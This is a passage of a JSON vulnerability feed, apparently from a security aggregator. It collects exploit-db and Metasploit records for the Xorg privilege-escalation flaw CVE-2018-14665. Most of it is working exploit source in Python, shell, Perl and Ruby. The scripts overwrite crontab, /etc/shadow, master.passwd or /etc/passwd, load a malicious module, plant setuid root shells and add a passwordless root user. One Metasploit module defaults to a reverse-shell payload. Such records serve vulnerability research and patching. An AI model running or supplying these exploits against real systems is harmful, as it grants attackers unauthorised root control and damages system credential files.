Waiting for job to run (may take a minute)...'\r\n end\r\nend", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45908"}, {"lastseen": "2018-11-30T12:31:24", "description": "", "published": "2018-11-13T00:00:00", "type": "exploitdb", "title": "xorg-x11-server < 1.20.1 - Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-11-13T00:00:00", "id": "EDB-ID:45832", "href": "https://www.exploit-db.com/exploits/45832", "sourceData": "# Exploit Title: xorg-x11-server < 1.20.1 - Local Privilege Escalation (RHEL 7)\r\n# Date: 2018-11-07\r\n# Exploit Author: @bolonobolo\r\n# Vendor Homepage: https://www.x.org/\r\n# Version: 1.19.5\r\n# Tested on: RHEL 7.3 && 7.5\r\n# CVE : CVE-2018-14665\r\n# Explanation\r\n# The only condition that has to be met for this PE to work via SSH is that the legitimate non-root user \r\n# has to be logged in through the console at the moment the PE script is launched.\r\n# In fact during the logged in session of the legitimate non-root user, \r\n# a file with the name of the non-root user will be created in the /var/run/console folder. \r\n# With that file present, the same non-root user can launch a Xorg command via SSH. \r\n# \r\n# Usage: $ python poc.py\r\n# $ python poc.py \r\n# [*] Waiting for bolo to connect to the console\r\n# [*] OK --> bolo console opened\r\n# [*] Building root shell wait 2 minutes\r\n# [*] crontab overwritten\r\n# \r\n# ... cut Xorg output ...\r\n# \r\n# [*] Xorg killed\r\n# (II) Server terminated successfully (0).
Closing log file.\r\n# [*] Don't forget to cleanup /etc/crontab and /tmp dir\r\n# sh-4.2# id && whoami\r\n# uid=0(root) gid=0(root) gruppi=0(root),1001(bolo)\r\n# root\r\n# sh-4.2#\r\n\r\n\r\n#!/usr/bin/python\r\nimport os\r\nimport getpass\r\nimport subprocess\r\n\r\nuserList = []\r\npath=\"/var/run/console/\"\r\n\r\ndef getWhoami():\r\n\treturn getpass.getuser()\r\n\r\ndef getConsole(path):\r\n\tp = subprocess.Popen([\"ls\", path], stdout=subprocess.PIPE)\r\n\t(console, err) = p.communicate()\r\n\tconsoleList = str.splitlines(console)\r\n\treturn consoleList\r\n\r\ndef payload():\r\n\tf = open(\"/tmp/payload\", \"w\")\r\n\tpayload = (\"cp /bin/sh /usr/local/bin/shell\\n\" \r\n\t\t\t\"echo \\\"#include <stdio.h> \\\" > /tmp/shell.c\\n\"\r\n \t\t\t\"echo \\\"#include <stdlib.h>\\\" >> /tmp/shell.c\\n\"\r\n \t\t\t\"echo \\\"#include <sys/types.h>\\\" >> /tmp/shell.c\\n\"\r\n \t\t\t\"echo \\\"#include <unistd.h>\\\" >> /tmp/shell.c\\n\"\r\n\t\t\t\"echo 'int main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}' >> /tmp/shell.c\\n\"\r\n\t\t\t\"gcc /tmp/shell.c -o /usr/local/bin/shell\\n\"\r\n\t\t\t\"chmod 4777 /usr/local/bin/shell\\n\")\r\n\tf.write(payload)\t\r\n\t\r\ndef executePayload():\t\r\n\tos.system(\"chmod +x /tmp/payload\")\r\n\tos.system(\"cd /etc; Xorg -fp \\\"* * * * * root /tmp/payload\\\" -logfile crontab :1 &\")\r\n\tprint \"[*] crontab overwritten\"\r\n\tos.system(\"sleep 5\")\r\n\tos.system(\"pkill Xorg\")\r\n\tprint \"[*] Xorg killed\"\r\n\tos.system(\"sleep 120\")\r\n\treturn\r\n\r\ndef main():\r\n\twhoami = getWhoami()\r\n\tprint \"[*] Waiting for \" + whoami + \" to connect to the console\"\r\n\ti = 0\r\n\twhile (i == 0):\r\n\t\tconsoleList = getConsole(path)\r\n\t\tfor user in consoleList:\r\n\t\t\tif user == whoami :\r\n\t\t\t\tprint \"[*] OK --> \" + user + \" console opened\"\r\n\t\t\t\ti = 1\r\n\tprint \"[*] Building root shell wait 2 minutes\"\r\n\tpayload()\r\n\texecutePayload()\r\n\tprint \"[*] Don't forget to cleanup /etc/crontab and /tmp 
dir\"\r\n\tos.system(\"/usr/local/bin/shell\")\t\t\t\r\n\r\nif __name__ == '__main__':\r\n\tmain()", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45832"}, {"lastseen": "2019-11-20T14:24:43", "description": "", "published": "2019-11-20T00:00:00", "type": "exploitdb", "title": "Xorg X11 Server - Local Privilege Escalation (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2019-11-20T00:00:00", "id": "EDB-ID:47701", "href": "https://www.exploit-db.com/exploits/47701", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GreatRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Xorg X11 Server Local Privilege Escalation',\r\n 'Description' => %q(\r\n WARNING: Successful execution of this module results in /etc/passwd being overwritten.\r\n\r\n This module is a port of the OpenBSD X11 Xorg exploit to run on AIX.\r\n\r\n A permission check flaw exists for -modulepath and -logfile options when\r\n starting Xorg. 
This allows unprivileged users that can start the server\r\n the ability to elevate privileges and run arbitrary code under root\r\n privileges.\r\n\r\n This module has been tested with AIX 7.1 and 7.2, and should also work with 6.1.\r\n Due to permission restrictions of the crontab in AIX, this module does not use cron,\r\n and instead overwrites /etc/passwd in order to create a new user with root privileges.\r\n All currently logged in users need to be included when /etc/passwd is overwritten,\r\n else AIX will throw 'Cannot get \"LOGNAME\" variable' when attempting to change user.\r\n The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX,\r\n and is replaced by '-config', in conjuction with ANSI-C quotes to inject newlines when\r\n overwriting /etc/passwd.\r\n ),\r\n 'Author' =>\r\n [\r\n 'Narendra Shinde', # Discovery and original FreeBSD exploit\r\n 'Zack Flack <dzflack[at]gmail.com>' # Metasploit module and original AIX exploit\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'DisclosureDate' => 'Oct 25 2018',\r\n 'Notes' =>\r\n {\r\n 'SideEffects' => [ CONFIG_CHANGES ]\r\n },\r\n 'References' =>\r\n [\r\n ['CVE', '2018-14665'],\r\n ['URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html'],\r\n ['URL', 'https://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc'],\r\n ['URL', 'https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl'],\r\n ['EDB', '45938']\r\n ],\r\n 'Platform' => ['unix'],\r\n 'Arch' => [ARCH_CMD],\r\n 'SessionTypes' => ['shell'],\r\n 'Payload' => {\r\n 'Compat' => {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'perl'\r\n }\r\n },\r\n 'DefaultOptions' => {\r\n 'Payload' => 'cmd/unix/reverse_perl'\r\n },\r\n 'Targets' =>\r\n [\r\n ['IBM AIX Version 6.1', {}],\r\n ['IBM AIX Version 7.1', {}],\r\n ['IBM AIX Version 7.2', {}]\r\n ],\r\n 'DefaultTarget' => 1))\r\n\r\n register_options(\r\n [\r\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\r\n ]\r\n 
)\r\n end\r\n\r\n def check\r\n xorg_path = cmd_exec('command -v Xorg')\r\n if !xorg_path.include?('Xorg')\r\n print_error('Could not find Xorg executable')\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n ksh93_path = cmd_exec('command -v ksh93')\r\n if !ksh93_path.include?('ksh')\r\n print_error('Could not find Ksh93 executable')\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n if !xorg_vulnerable?\r\n print_error('Xorg version is not vulnerable')\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n return Exploit::CheckCode::Appears\r\n end\r\n\r\n def exploit\r\n status = check\r\n\r\n if status == Exploit::CheckCode::Safe\r\n fail_with(Failure::NotVulnerable, '')\r\n end\r\n\r\n if !writable?(datastore['WritableDir'])\r\n fail_with(Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\")\r\n end\r\n\r\n xorg_path = cmd_exec('command -v Xorg')\r\n ksh93_path = cmd_exec('command -v ksh93')\r\n\r\n xorg_payload = generate_xorg_payload(xorg_path, ksh93_path, datastore['WritableDir'])\r\n xorg_script_path = \"#{datastore['WritableDir']}/wow.ksh\"\r\n upload_and_chmodx(xorg_script_path, xorg_payload)\r\n\r\n passwd_backup = \"#{datastore['WritableDir']}/passwd.backup\"\r\n print_status(\"Backing up /etc/passwd to #{passwd_backup}\")\r\n cmd_exec(\"cp /etc/passwd #{passwd_backup}\")\r\n register_file_for_cleanup(passwd_backup)\r\n\r\n print_status(\"Executing #{xorg_script_path}\")\r\n cmd_exec(xorg_script_path)\r\n print_status('Checking if we are root')\r\n\r\n if root?\r\n shell_payload = %(#!#{ksh93_path}\r\n#{payload.encoded}\r\n)\r\n shell_script_path = \"#{datastore['WritableDir']}/wowee.ksh\"\r\n upload_and_chmodx(shell_script_path, shell_payload)\r\n\r\n print_status('Executing shell payload')\r\n cmd_exec(\"#{ksh93_path} -c \\\"echo #{shell_script_path} | su - wow &\\\"\")\r\n\r\n print_status('Restoring original /etc/passwd')\r\n cmd_exec(\"su - wow -c \\\"cp #{passwd_backup} /etc/passwd\\\"\")\r\n else\r\n 
fail_with(Failure::PayloadFailed, '')\r\n end\r\n end\r\n\r\n def generate_xorg_payload(xorg_path, ksh93_path, writabledir)\r\n passwd_file = read_file('/etc/passwd')\r\n passwd_array = passwd_file.split(\"\\n\")\r\n\r\n print_status('Retrieving currently logged in users')\r\n users = cmd_exec('who | cut -d\\' \\' -f1 | sort | uniq')\r\n users << \"\\n\"\r\n users_array = users.split(\"\\n\")\r\n\r\n logged_in_users = ''\r\n if !users_array.empty?\r\n users_array.each do |user|\r\n user << ':'\r\n passwd_array.each do |line|\r\n if line.index(user) == 0\r\n logged_in_users << '\\n'\r\n logged_in_users << line\r\n end\r\n end\r\n end\r\n end\r\n\r\n passwd_data = \"$'#{logged_in_users}\\\\nwow::0:0::/:/usr/bin/ksh\\\\n#'\"\r\n\r\n subdir_count = writabledir.count('/')\r\n relative_passwd = '../' * subdir_count + '../../etc/passwd'\r\n\r\n return %(#!#{ksh93_path}\r\n #{xorg_path} -config #{passwd_data} -logfile #{relative_passwd} :1 > /dev/null 2>&1\r\n)\r\n end\r\n\r\n def xorg_vulnerable?\r\n version = cmd_exec('lslpp -L | grep -i X11.base.rte | awk \\'{ print $2 }\\'')\r\n print_status(\"Xorg version is #{version}\")\r\n semantic_version = Gem::Version.new(version)\r\n\r\n vulnerable_versions = [\r\n ['6.1.9.0', '6.1.9.100'],\r\n ['7.1.4.0', '7.1.4.30'],\r\n ['7.1.5.0', '7.1.5.31'],\r\n ['7.2.0.0', '7.2.0.1'],\r\n ['7.2.1.0', '7.2.1.0'],\r\n ['7.2.2.0', '7.2.2.0'],\r\n ['7.2.3.0', '7.2.3.15']\r\n ]\r\n\r\n vulnerable_versions.each do |version_pair|\r\n if semantic_version >= Gem::Version.new(version_pair[0]) &&\r\n semantic_version <= Gem::Version.new(version_pair[1])\r\n return true\r\n end\r\n end\r\n\r\n return false\r\n end\r\n\r\n def root?\r\n id_output = cmd_exec('su - wow -c \"id\"')\r\n\r\n if id_output.include?('euid=0') || id_output.include?('uid=0')\r\n print_good('Got root!')\r\n return true\r\n end\r\n\r\n print_error('Not root')\r\n false\r\n end\r\n\r\n def upload_and_chmodx(path, data)\r\n print_status(\"Writing to #{path}\")\r\n rm_f(path)\r\n 
write_file(path, data)\r\n cmd_exec(\"chmod 0555 '#{path}'\")\r\n\r\n register_file_for_cleanup(path)\r\n end\r\nend", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/47701"}, {"lastseen": "2018-11-30T21:59:55", "description": "", "published": "2018-11-30T00:00:00", "type": "exploitdb", "title": "xorg-x11-server < 1.20.3 - 'modulepath' Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-11-30T00:00:00", "id": "EDB-ID:45922", "href": "https://www.exploit-db.com/exploits/45922", "sourceData": "#!/bin/sh\r\n\r\n#\r\n# raptor_xorgy - xorg-x11-server LPE via modulepath switch\r\n# Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>\r\n#\r\n# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission \r\n# check for -modulepath and -logfile options when starting Xorg. X server \r\n# allows unprivileged users with the ability to log in to the system via \r\n# physical console to escalate their privileges and run arbitrary code under \r\n# root privileges (CVE-2018-14665).\r\n#\r\n# This exploit variant triggers the bug in the -modulepath command line switch\r\n# to load a malicious X11 module in order to escalate privileges to root on\r\n# vulnerable systems. This technique is less invasive than exploiting the \r\n# -logfile switch, however the gcc compiler must be present in order for it to\r\n# work out of the box. Alternatively, you must use a pre-compiled malicious .so\r\n# compatible with the target system and modify the exploit accordingly.\r\n#\r\n# It works very reliably on Solaris 11.4 and should work on most vulnerable\r\n# Linux distributions (though I haven't tested it). For some reason, it fails to\r\n# obtain uid 0 on OpenBSD... 
They might have an additional protection in place.\r\n#\r\n# Thanks to @alanc and @nushinde for discussing this alternative vector.\r\n#\r\n# See also:\r\n# https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm\r\n# https://github.com/0xdea/exploits/blob/master/solaris/raptor_solgasm\r\n# https://www.securepatterns.com/2018/10/cve-2018-14665-another-way-of.html\r\n# https://nvd.nist.gov/vuln/detail/CVE-2006-0745\r\n#\r\n# Usage:\r\n# raptor@stalker:~$ chmod +x raptor_xorgy\r\n# raptor@stalker:~$ ./raptor_xorgy\r\n# [...]\r\n# root@stalker:~# id\r\n# uid=0(root) gid=0(root)\r\n#\r\n# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2):\r\n# Oracle Solaris 11 X86 [tested on 11.4.0.0.1.15.0 with Xorg 1.19.5]\r\n# Oracle Solaris 11 SPARC [untested]\r\n# CentOS Linux 7 [untested, it should work]\r\n# Red Hat Enterprise Linux 7 [untested]\r\n# Ubuntu Linux 18.10 [untested]\r\n# Ubuntu Linux 18.04 LTS [untested]\r\n# Ubuntu Linux 16.04 LTS [untested]\r\n# Debian GNU/Linux 9 [untested]\r\n# [...]\r\n#\r\n\r\necho \"raptor_xorgy - xorg-x11-server LPE via modulepath switch\"\r\necho \"Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>\"\r\necho\r\n\r\n# prepare the payload\r\ncat << EOF > /tmp/pwned.c\r\n_init()\r\n{\r\n\tsetuid(0);\r\n\tsetgid(0);\r\n\tsystem(\"/bin/bash\");\r\n}\r\nEOF\r\n# libglx.so should be a good target, refer to Xorg logs for other candidates\r\ngcc -fPIC -shared -nostartfiles -w /tmp/pwned.c -o /tmp/libglx.so\r\nif [ $? 
-ne 0 ]; then echo; echo \"error: cannot compile /tmp/pwned.c\"; exit; fi\r\n\r\n# trigger the bug\r\necho \"Got root?\"\r\nXorg -modulepath \",/tmp\" :1", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45922"}, {"lastseen": "2018-11-30T12:31:31", "description": "", "published": "2018-10-30T00:00:00", "type": "exploitdb", "title": "xorg-x11-server 1.20.3 - Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-10-30T00:00:00", "id": "EDB-ID:45742", "href": "https://www.exploit-db.com/exploits/45742", "sourceData": "# Exploit Title: xorg-x11-server 1.20.3 - Privilege Escalation\r\n# Date: 2018-10-27\r\n# Exploit Author: Marco Ivaldi\r\n# Vendor Homepage: https://www.x.org/\r\n# Version: xorg-x11-server 1.19.0 - 1.20.2\r\n# Tested on: OpenBSD 6.3 and 6.4\r\n# CVE : CVE-2018-14665\r\n\r\n# raptor_xorgasm\r\n\r\n#!/bin/sh\r\n\r\n#\r\n# raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron\r\n# Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>\r\n#\r\n# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission \r\n# check for -modulepath and -logfile options when starting Xorg. X server \r\n# allows unprivileged users with the ability to log in to the system via \r\n# physical console to escalate their privileges and run arbitrary code under \r\n# root privileges (CVE-2018-14665).\r\n#\r\n# This exploit targets OpenBSD's cron in order to escalate privileges to\r\n# root on OpenBSD 6.3 and 6.4. 
You don't need to be connected to a physical\r\n# console, it works perfectly on pseudo-terminals connected via SSH as well.\r\n#\r\n# See also:\r\n# https://lists.x.org/archives/xorg-announce/2018-October/002927.html\r\n# https://www.exploit-db.com/exploits/45697/\r\n# https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850\r\n#\r\n# Usage:\r\n# blobfish$ chmod +x raptor_xorgasm\r\n# blobfish$ ./raptor_xorgasm\r\n# [...]\r\n# Be patient for a couple of minutes...\r\n# [...]\r\n# Don't forget to cleanup and run crontab -e to reload the crontab.\r\n# -rw-r--r-- 1 root wheel 47327 Oct 27 14:48 /etc/crontab\r\n# -rwsrwxrwx 1 root wheel 7417 Oct 27 14:50 /usr/local/bin/pwned\r\n# blobfish# id\r\n# uid=0(root) gid=0(wheel) groups=1000(raptor), 0(wheel)\r\n#\r\n# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2):\r\n# OpenBSD 6.4 (Xorg 1.19.6) [tested]\r\n# OpenBSD 6.3 (Xorg 1.19.6) [tested]\r\n#\r\n\r\necho \"raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron\"\r\necho \"Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>\"\r\n\r\n# prepare the payload\r\ncat << EOF > /tmp/xorgasm\r\ncp /bin/sh /usr/local/bin/pwned # fallback in case gcc is not available\r\necho \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c\r\ngcc /tmp/pwned.c -o /usr/local/bin/pwned # most dirs are mounted nosuid\r\nchmod 4777 /usr/local/bin/pwned\r\nEOF\r\nchmod +x /tmp/xorgasm\r\n\r\n# trigger the bug\r\ncd /etc\r\nXorg -fp \"* * * * * root /tmp/xorgasm\" -logfile crontab :1 &\r\nsleep 5\r\npkill Xorg\r\n\r\n# run the setuid shell\r\necho\r\necho \"Be patient for a couple of minutes...\"\r\necho\r\nsleep 120\r\necho\r\necho \"Don't forget to cleanup and run crontab -e to reload the crontab.\"\r\nls -l /etc/crontab*\r\nls -l /usr/local/bin/pwned\r\n/usr/local/bin/pwned", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45742"}, {"lastseen": "2018-11-30T12:31:34", "description": "", "published": 
"2018-10-25T00:00:00", "type": "exploitdb", "title": "xorg-x11-server < 1.20.3 - Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-10-25T00:00:00", "id": "EDB-ID:45697", "href": "https://www.exploit-db.com/exploits/45697", "sourceData": "#CVE-2018-14665 - a LPE exploit via http://X.org fits in a tweet\r\n\r\ncd /etc; Xorg -fp \"root::16431:0:99999:7:::\" -logfile shadow :1;su\r\n\r\nOverwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected.\r\n\r\n\r\n\r\n\r\n\r\n#!/bin/sh\r\n# local privilege escalation in X11 currently\r\n# unpatched in OpenBSD 6.4 stable - exploit\r\n# uses cve-2018-14665 to overwrite files as root. \r\n# Impacts Xorg 1.19.0 - 1.20.2 which ships setuid\r\n# and vulnerable in default OpenBSD.\r\n#\r\n# - https://hacker.house\r\necho [+] OpenBSD 6.4-stable local root exploit\r\ncd /etc\r\nXorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 &\r\nsleep 5\r\npkill Xorg\r\necho [-] dont forget to mv and chmod /etc/master.passwd.old back \r\necho [+] type 'Password1' and hit enter for root\r\nsu -\r\n\r\n\r\nEBB Note ~ Another version of it: https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45697"}, {"lastseen": "2018-12-04T16:13:21", "description": "", "published": "2018-12-04T00:00:00", "type": "exploitdb", "title": "Xorg X11 Server (AIX) - Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-12-04T00:00:00", "id": "EDB-ID:45938", "href": "https://www.exploit-db.com/exploits/45938", "sourceData": "# Exploit Title: AIX Xorg X11 Server - Local Privilege Escalation\r\n# Date: 29/11/2018\r\n# Exploit Author: @0xdono\r\n# Original Discovery and Exploit: Narendra Shinde\r\n# Vendor Homepage: 
https://www.x.org/\r\n# Platform: AIX\r\n# Version: X Window System Version 7.1.1\r\n# Fileset: X11.base.rte < 7.1.5.32\r\n# Tested on: AIX 7.1 (6.x to 7.x should be vulnerable)\r\n# CVE: CVE-2018-14665\r\n#\r\n# Explanation:\r\n# Incorrect command-line parameter validation in the Xorg X server can\r\n# lead to privilege elevation and/or arbitrary files overwrite, when the\r\n# X server is running with elevated privileges.\r\n# The -logfile argument can be used to overwrite arbitrary files in the\r\n# file system, due to incorrect checks in the parsing of the option.\r\n#\r\n# This is a port of the OpenBSD X11 Xorg exploit to run on AIX.\r\n# It overwrites /etc/passwd in order to create a new user with root privileges.\r\n# All currently logged in users need to be included when /etc/passwd is overwritten,\r\n# else AIX will throw 'Cannot get \"LOGNAME\" variable' when attempting to change user.\r\n# The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX,\r\n# and is replaced by '-config'.\r\n# ksh93 is used for ANSI-C quoting, and is installed by default on AIX.\r\n#\r\n# IBM has not yet released a patch as of 29/11/2018.\r\n#\r\n# See also:\r\n# https://lists.x.org/archives/xorg-announce/2018-October/002927.html\r\n# https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html\r\n# https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl\r\n#\r\n# Usage:\r\n# $ oslevel -s\r\n# 7100-04-00-0000\r\n# $ Xorg -version\r\n# \r\n# X Window System Version 7.1.1\r\n# Release Date: 12 May 2006\r\n# X Protocol Version 11, Revision 0, Release 7.1.1\r\n# Build Operating System: AIX IBM\r\n# Current Operating System: AIX sovma470 1 7 00C3C6F54C00\r\n# Build Date: 07 July 2006\r\n# Before reporting problems, check http://wiki.x.org\r\n# to make sure that you have the latest version.\r\n# Module Loader present\r\n# $ id\r\n# uid=16500(nmyo) gid=1(staff)\r\n# $ perl aixxorg.pl\r\n# [+] AIX X11 server local root 
exploit\r\n# [-] Checking for Xorg and ksh93\r\n# [-] Opening /etc/passwd\r\n# [-] Retrieving currently logged in users\r\n# [-] Generating Xorg command\r\n# [-] Opening /tmp/wow.ksh\r\n# [-] Writing Xorg command to /tmp/wow.ksh\r\n# [-] Backing up /etc/passwd to /tmp/passwd.backup\r\n# [-] Making /tmp/wow.ksh executable\r\n# [-] Executing /tmp/wow.ksh\r\n# [-] Cleaning up /etc/passwd and removing /tmp/wow.ksh\r\n# [-] Done\r\n# [+] 'su wow' for root shell\r\n# $ su wow\r\n# # id\r\n# uid=0(root) gid=0(system)\r\n# # whoami\r\n# root\r\n\r\n#!/usr/bin/perl\r\nprint \"[+] AIX X11 server local root exploit\\n\";\r\n\r\n# Check Xorg is in path\r\nprint \"[-] Checking for Xorg and ksh93 \\n\";\r\nchomp($xorg = `command -v Xorg`);\r\nif ($xorg eq \"\"){\r\n print \"[X] Can't find Xorg binary, try hardcode it? exiting... \\n\";\r\n exit;\r\n}\r\n\r\n# Check ksh93 is in path\r\nchomp($ksh = `command -v ksh93`);\r\nif ($ksh eq \"\"){\r\n print \"[X] Can't find ksh93 binary, try hardcode it? exiting... \\n\";\r\n exit;\r\n}\r\n\r\n# Read in /etc/passwd\r\nprint \"[-] Opening /etc/passwd \\n\";\r\nopen($passwd_fh, '<', \"/etc/passwd\");\r\nchomp(@passwd_array = <$passwd_fh>);\r\nclose($passwd_fh);\r\n\r\n# Retrieve currently logged in users\r\nprint \"[-] Retrieving currently logged in users \\n\";\r\n@users = `who | cut -d' ' -f1 | sort | uniq`;\r\nchomp(@users);\r\n\r\n# For all logged in users, add their current passwd entry to string\r\n# that will be used to overwrite passwd\r\n$users_logged_in_passwd = '';\r\nforeach my $user (@users)\r\n{\r\n $user .= \":\";\r\n foreach my $line (@passwd_array)\r\n {\r\n if (index($line, $user) == 0) {\r\n $users_logged_in_passwd = $users_logged_in_passwd . '\\n' . $line;\r\n }\r\n }\r\n}\r\n\r\n# Use '-config' as '-fp' (which is used in the original BSD exploit) is not written to log\r\nprint \"[-] Generating Xorg command \\n\";\r\n$blob = '-config ' . '$\\'' . 
$users_logged_in_passwd . '\\nwow::0:0::/:/usr/bin/ksh\\n#' . '\\'';\r\n\r\nprint \"[-] Opening /tmp/wow.ksh \\n\";\r\nopen($fr, '>', \"/tmp/wow.ksh\");\r\n\r\n# Use ksh93 for ANSI-C quoting\r\nprint \"[-] Writing Xorg command to /tmp/wow.ksh \\n\";\r\nprint $fr '#!' . \"$ksh\\n\";\r\nprint $fr \"$xorg $blob -logfile ../etc/passwd :1 > /dev/null 2>&1 \\n\";\r\nclose $fr;\r\n\r\n# Backup passwd\r\nprint \"[-] Backing up /etc/passwd to /tmp/passwd.backup \\n\";\r\nsystem(\"cp /etc/passwd /tmp/passwd.backup\");\r\n\r\n# Make script executable and run it\r\nprint \"[-] Making /tmp/wow.ksh executable \\n\";\r\nsystem(\"chmod +x /tmp/wow.ksh\");\r\nprint \"[-] Executing /tmp/wow.ksh \\n\";\r\nsystem(\"/tmp/wow.ksh\");\r\n\r\n# Replace overwritten passwd with: original passwd + wow user\r\nprint \"[-] Cleaning up /etc/passwd and removing /tmp/wow.ksh \\n\";\r\n$result = `su wow \"-c cp /tmp/passwd.backup /etc/passwd && echo 'wow::0:0::/:/usr/bin/ksh' >> /etc/passwd\" && rm /tmp/wow.ksh`;\r\n\r\nprint \"[-] Done \\n\";\r\nprint \"[+] 'su wow' for root shell \\n\";", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45938"}], "metasploit": [{"lastseen": "2020-10-13T17:37:50", "description": "This module attempts to gain root privileges with SUID Xorg X11 server versions 1.19.0 < 1.20.3. A permission check flaw exists for -modulepath and -logfile options when starting Xorg. This allows unprivileged users that can start the server the ability to elevate privileges and run arbitrary code under root privileges. This module has been tested with CentOS 7 (1708). CentOS default install will require console auth for the users session. Xorg must have SUID permissions and may not start if running. 
On successful exploitation artifacts will be created consistent with starting Xorg.\n", "published": "2018-11-25T21:54:37", "type": "metasploit", "title": "Xorg X11 Server SUID modulepath Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/LOCAL/XORG_X11_SUID_SERVER_MODULEPATH", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GoodRanking\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::Kernel\n include Msf::Post::Linux::System\n\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Xorg X11 Server SUID modulepath Privilege Escalation',\n 'Description' => %q{\n This module attempts to gain root privileges with SUID Xorg X11 server\n versions 1.19.0 < 1.20.3.\n\n A permission check flaw exists for -modulepath and -logfile options when\n starting Xorg. 
This allows unprivileged users that can start the server\n the ability to elevate privileges and run arbitrary code under root\n privileges.\n\n This module has been tested with CentOS 7 (1708).\n CentOS default install will require console auth for the users session.\n Xorg must have SUID permissions and may not start if running.\n\n On successful exploitation artifacts will be created consistent\n with starting Xorg.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Narendra Shinde', # Discovery and exploit\n 'Aaron Ringo', # Metasploit module\n ],\n 'DisclosureDate' => '2018-10-25',\n 'References' =>\n [\n [ 'CVE', '2018-14665' ],\n [ 'BID', '105741' ],\n [ 'EDB', '45697' ],\n [ 'EDB', '45742' ],\n [ 'EDB', '45832' ],\n [ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-another-way-of.html' ]\n ],\n 'Platform' => %w[linux unix solaris],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => %w[shell meterpreter],\n 'Targets' =>\n [\n ['Linux x64', {\n 'Platform' => 'linux',\n 'Arch' => ARCH_X64 } ],\n ['Linux x86', {\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86 } ],\n ['Solaris x86', {\n 'Platform' => [ 'solaris', 'unix' ],\n 'Arch' => ARCH_SPARC } ],\n ['Solaris x64', {\n 'Platform' => [ 'solaris', 'unix' ],\n 'Arch' => ARCH_SPARC } ],\n ],\n 'DefaultTarget' => 0))\n\n register_advanced_options(\n [\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),\n OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]),\n OptBool.new('ConsoleLock', [ true, 'Will check for console lock under linux', true ]),\n OptString.new('sofile', [ true, 'Xorg shared object name for modulepath', 'libglx.so' ])\n ]\n )\n end\n\n\n def check\n # linux checks\n uname = cmd_exec \"uname\"\n if uname =~ /linux/i\n vprint_status \"Running additional check for Linux\"\n if datastore['ConsoleLock']\n user = cmd_exec \"id 